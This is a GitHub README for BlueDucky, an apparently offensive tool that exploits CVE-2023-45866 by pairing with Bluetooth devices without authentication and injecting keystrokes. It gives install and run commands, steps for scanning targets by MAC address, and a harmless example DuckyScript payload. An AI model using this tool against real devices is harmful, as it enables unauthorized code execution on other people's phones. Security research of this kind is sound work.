Skip to content

🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript) πŸ”“ Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)

Notifications You must be signed in to change notification settings

pentestfunctions/BlueDucky

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

79 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

BlueDucky Ver 2.1 (Android) πŸ¦†

Thanks to all the people at HackNexus. Make sure you come join us on VC ! https://discord.gg/HackNexus

NOTES: I will not be able to run this on a laptop or other device outside of a raspberry pi for testing. Due to this, any issues you have will need to be resolved amonsgt each other as I do not have the spare funds to buy an adapter.

  1. saad0x1's GitHub
  2. spicydll's GitHub
  3. lamentomori's GitHub

🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript)

πŸ”“ Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)

This is an implementation of the CVE discovered by marcnewlin

Introduction πŸ“’

BlueDucky is a powerful tool for exploiting a vulnerability in Bluetooth devices. By running this script, you can:

  1. πŸ“‘ Load saved Bluetooth devices that are no longer visible but have Bluetooth still enabled.
  2. πŸ“‚ Automatically save any devices you scan.
  3. πŸ’Œ Send messages via ducky script format to interact with devices.

I've successfully run this on a Raspberry Pi 4 using the default Bluetooth module. It works against various phones, with an interesting exception for a New Zealand brand, Vodafone.

Installation and Usage πŸ› οΈ

Setup Instructions for Debian-based

# update apt
sudo apt-get update
sudo apt-get -y upgrade

# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
                    git gcc python3-pip python3-setuptools \
                    python3-pydbus

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Setup Instructions for Arch-based

# update pacman & packages
sudo pacman -Syyu

# install dependencies
# since arch doesn't separate lib packages: libbluetooth-dev included in bluez package
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
               python-setuptools python-pydbus python-dbus
               git gcc python-pip \

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Running BlueDucky

git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py

alternatively,

pip3 install -r requirements.txt

Operational Steps πŸ•ΉοΈ

  1. On running, it prompts for the target MAC address.
  2. Pressing nothing triggers an automatic scan for devices.
  3. Devices previously found are stored in known_devices.txt.
  4. If known_devices.txt exists, it checks this file before scanning.
  5. Executes using payload.txt file.
  6. Successful execution will result in automatic connection and script running.

Duckyscript πŸ’»

🚧 Work in Progress:

  • Suggest me ideas

Version 2.1 πŸ›

  • Updated UI
  • Improved User Experience
  • Bluetooth Debugger; Checks your bluetooth adapters, and installed dependancies before allowing access to the application, this is to prevent devices that are not supported.
  • Please Note: Numerous Changes have been made,please reference the commit history for specific changes.

What's Planned for the Next Release?

  • Integrated DuckyScript Console for attacks that want to maintain persistance, after a payload has been ran
  • Suggest What Should be added next! Join https://discord.gg/HackNexus

πŸ“ Example payload.txt:

REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300

Enjoy experimenting with BlueDucky! 🌟

About

🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript) πŸ”“ Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages